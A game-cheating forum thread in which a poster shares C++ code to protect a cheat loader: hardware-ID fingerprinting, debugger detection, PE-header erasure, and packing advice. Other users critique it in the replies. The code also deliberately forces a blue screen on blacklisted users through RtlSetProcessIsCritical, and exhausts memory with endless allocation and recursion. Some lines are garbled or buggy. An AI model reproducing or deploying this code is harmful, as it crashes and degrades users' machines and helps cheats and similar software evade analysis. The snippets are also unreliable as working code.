Anti-Debugging Methods, HWID Protection And More

Get HWID:

Code:

void getHWID()
{
	// GetVolumeInformationA
	DWORD DriveSerial;

	// GetComputerNameA
	TCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1];
	DWORD size = sizeof(ComputerName) / sizeof(ComputerName[0]);
	// OS GUID
	HW_PROFILE_INFO hwProfileInfo;
	DWORD OsGUID;
	GetVolumeInformationA(0, nullptr, '\0', &DriveSerial, nullptr, nullptr, nullptr, 0);
	GetComputerNameA(ComputerName, &size);
	GetCurrentHwProfileA(&hwProfileInfo);
	memcpy(&OsGUID, &hwProfileInfo.szHwProfileGuid, sizeof(hwProfileInfo.szHwProfileGuid));
	//UserDriveSerial = to_string(DriveSerial);
	UserComputerName = ComputerName;
	UserOsGUID = to_string(OsGUID);
	string Messer = "2134[sl";
	UserCombineHWID = Messer + UserComputerName + UserOsGUID;
}

Hasher:

Code:

#define A 54059
#define B 45963
#define C 86264
#define FIRSTH 37
using namespace std;
unsigned hash_str(const char* s)
{
	unsigned h = FIRSTH;
	while (*s) {
		h = (h * A) ^ (s[0] * B);
		s++;
	}
	return h; // or return h % C;
}

SelfDestruct (Need It For Anti Debug) :

Code:

void SelfDestruct()
{
	std::vector<char*> explosion;
	while (true)
		explosion.push_back(new char[10000]);
}

Blue Screen (Need It For BlackListed Users):

Code:

void BSODBaby()
{
	typedef long (WINAPI *RtlSetProcessIsCritical)
		(BOOLEAN New, BOOLEAN *Old, BOOLEAN NeedScb);
	auto ntdll = LoadLibraryA("ntdll.dll");
	if (ntdll) {
		auto SetProcessIsCritical = (RtlSetProcessIsCritical)
			GetProcAddress(ntdll, "RtlSetProcessIsCritical");
		if (SetProcessIsCritical)
			SetProcessIsCritical(1, 0, 0);
	}
}

Debugger Checks:

Code:

typedef void(*_recurse)();
void recurse1(); void recurse2();
void recurse3(); void recurse4();
void recurse5();
_recurse recfuncs[5] = {
	&recurse1, &recurse2, &recurse3,
	&recurse4, &recurse5
};
void recurse1() { recfuncs[rand() % 5](); }
void recurse2() { recfuncs[(rand() % 3) + 2](); }
void recurse3()
{
	if (rand() % 100 < 50) recurse1();
	else recfuncs[(rand() % 3) + 1]();
}
void recurse4() { recfuncs[rand() % 2](); }
void recurse5()
{
	for (int i = 0; i < 100; i++)
		if (rand() % 50 == 1)
			recfuncs[i % 5]();
	recurse5();
}

bool HasHardwareBreakpoints()
{
	CONTEXT ctx = { 0 };
	ct*****ntextFlags = CONTEXT_DEBUG_REGISTERS;
	auto hThread = GetCurrentThread();
	if (GetThreadContext(hThread, &ctx) == 0)
		return false;
	return (ctx.Dr0 != 0 || ctx.Dr1 != 0 || ctx.Dr2 != 0 || ctx.Dr3 != 0);
}
bool DebuggerDriversPresent()
{
	// an array of common debugger driver device names
	const char drivers[9][20] = {
		"\\\\.\\EXTREM", "\\\\.\\ICEEXT",
		"\\\\.\\NDBGMSG.VXD", "\\\\.\\RING0",
		"\\\\.\\SIWVID", "\\\\.\\SYSER",
		"\\\\.\\TRW", "\\\\.\\SYSERBOOT",
		"\0"
	};
	for (int i = 0; drivers[i][0] != '\0'; i++) {
		auto h = CreateFileA(drivers[i], 0, 0, 0, OPEN_EXISTING, 0, 0);
		if (h != INVALID_HANDLE_VALUE)
		{
			CloseHandle(h);
			return true;
		}
	}
	return false;
}
inline bool IsDbgPresentPrefixCheck()
{
	__try
	{
		__asm __emit 0xF3 // 0xF3 0x64 disassembles as PREFIX REP:
		__asm __emit 0x64
		__asm __emit 0xF1 // One byte INT 1
	}
	__except (EXCEPTION_EXECUTE_HANDLER)
	{
		return false;
	}

	return true;
}
inline bool Int2DCheck()
{
	__try
	{
		__asm
		{
			int 0x2d
			xor eax, eax
			add eax, 2
		}
	}
	__except (EXCEPTION_EXECUTE_HANDLER)
	{
		return false;
	}

	return true;
}
inline bool Has2DBreakpointHandler()
{
	__try { __asm INT 0x2D }
	__except (EXCEPTION_EXECUTE_HANDLER) { return false; }
	return true;
}
inline bool Has03BreakpointHandler()
{
	__try { __asm INT 0x03 }
	__except (EXCEPTION_EXECUTE_HANDLER) { return false; }
	return true;
}
inline void ErasePEHeaderFromMemory()
{
	DWORD OldProtect = 0;

	// Get base address of module
	char *pBaseAddr = (char*)GetModuleHandle(NULL);

	// Change memory protection
	VirtualProtect(pBaseAddr, 4096, // Assume x86 page size
		PAGE_READWRITE, &OldProtect);

	// Erase the header
	ZeroMemory(pBaseAddr, 4096);
}
void CheckForDebuggers()
{
	if (HasHardwareBreakpoints() || DebuggerDriversPresent() || HasHardwareBreakpoints() || IsDbgPresentPrefixCheck() || Has2DBreakpointHandler() || Int2DCheck() || Has03BreakpointHandler() || IsDebuggerPresent())
	{
		ErasePEHeaderFromMemory();
		recurse1();
		//DebugSelf();
		SelfDestruct();
		OutputDebugString("%s%s%s%s");
		exit(1);
	}
}

How To Check HWID / BlackList People:

CheckForDebuggers() << Checks Debuggers

hash_str(UserCombineHWID.c_str()) << Hashes HWID

Code:

else if (hash_str(UserCombineHWID.c_str()) == <BlackListedShitters>)
	{
		BSODBaby();
		recurse1();
		SelfDestruct();
		exit(1);
	}

^^ BlackList Users ^^

Side Note:

Pack It With Enigma (They make it so that the code also only be unpacked if called or almost being called ) ( Every packed things gets unpacked bits by bits while running in memory)
Hardcoding The HWID Will Be Better As The Only Ways To Bypass The Anti Debuggers Methods Is By A Professional Or Emulator, So Hardcode Will Work Better
This Is Not My Codes, Credits Goes To The Internet And Books I Read

Books To Read To Further Understand How This Works:

Game Hacking
Gray Hat Hacking - 4th Edition
Hacking The Art Of Exploitation

Books Will Be Attached Below, Leave A Thanks If This Helped

Virus

htt ps:// ww w.virustotal. com/en/file/9c6d33333e98166b67b37c6e3ff48ffe8d25520e4968430bde c09be413ef9212/analysis/1499571729/

http s:// virusscan.jotti. org/en-GB/filescanjob/6xbtq0c3ig

i did not use some of the functions right, as the fake exceptions, no time to fix it now, sorry

Books_mpgh.net.rar

anti debugger checks in 2017...

if you think that locally storing your module security checks and checking if a debugger is present will prevent you from getting dumped, you have never reverse engineered a piece of software in your life.

This is just a huge compilation of already public code anyone can find with a few minutes of googling, and I don't think hardcoding hwids would be a smart idea.

Originally Posted by terryadavis

i hope you realise this is to make it harder, not impossible

//Approved, enjoy reading

Originally Posted by ver0x

This is just a huge compilation of already public code anyone can find with a few minutes of googling, and I don't think hardcoding hwids would be a smart idea.

i know, its because of some people not bothering to search

- - - Updated - - -

Originally Posted by ver0x

This is just a huge compilation of already public code anyone can find with a few minutes of googling, and I don't think hardcoding hwids would be a smart idea.

hardcoding this is better, as packing the hack and not allowing the user to even bypass the main function cant even read it, since that part is not unpacked

"anti-debug"

Originally Posted by certmemer

"anti-debug"

yea, the name is abit off, sorry about that

It's a """"""""""""""""Anti-Debug"""""""""""""""""" cuz most wont even have an effect, also, storing local uniqueid isn't smart/near close to safe, lol

I have just a doubt, why the f-ck you cause a bluescreen and after that you make a while loop calling random shit, and even after that inifite loop make another loop, like... wtf they don't do a shit, most pc's can handle that, and well, if the pc is bluescreen'ed it won't even execute that part, and from the first infinite loop, it won't even exec the 3th function, loololol[olp;ikoikedhrgikjghtyedrfp;iknedthyrjikdthdthj.

bai. back to the cave.

Originally Posted by PhY'z

sorry m8, i know afew ways to bypass the loop. so just making sure that you cant really bypass this easily, like i said that its to make harder not impossible

Originally Posted by GlitchInecptionReborn

sorry m8, i know afew ways to bypass the loop. so just making sure that you cant really bypass this easily, like i said that its to make harder not impossible

Then your whole effort to making it anti-debugger is useless, as you said, you can bypass, lol

Originally Posted by PhY'z

Then your whole effort to making it anti-debugger is useless, as you said, you can bypass, lol

its not that easy to bypass it, therefor adding more dead end loops makes it harder

This is bad, chromacheats uses the latest methods for antidebug:

If (getprocbyname("ollydbg"))
exit(1);

There are better things here:
https://******.com/zer0fl4g/DebugDetector

All of them are right from the MSDN forum. Also his idea is pretty better, stay away with it from your cheat, MAP the dll into any other process, verify externally, then if is the case, pass the instruction to your cheat/loader/or what fucking ever you are doing, to close/bluescreen.

Cra0 posted a failure a time ago that can cause a ez blue screen:
codez: https://pastebin.com/6ShqDtP3

--------------
Done...
More pasta for pasters i guess. That will finish in the same spot that is right now, pasters will paste, no idea on how it works, will finish in nothing working, no anti-debug.

Originally Posted by PhY'z

thanks for the help, will look through the link

Anti-Debugging Methods, HWID Protection And More

Post a Reply

Similar Threads

Tags for this Thread